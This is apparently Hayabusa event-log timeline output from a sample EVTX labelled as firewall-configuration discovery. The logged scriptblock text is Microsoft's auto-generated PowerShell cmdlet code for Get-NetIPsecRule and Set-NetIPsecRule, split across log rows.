[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description',",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values 
= @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) 
$__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 
'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', 
${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] 
${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] 
${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
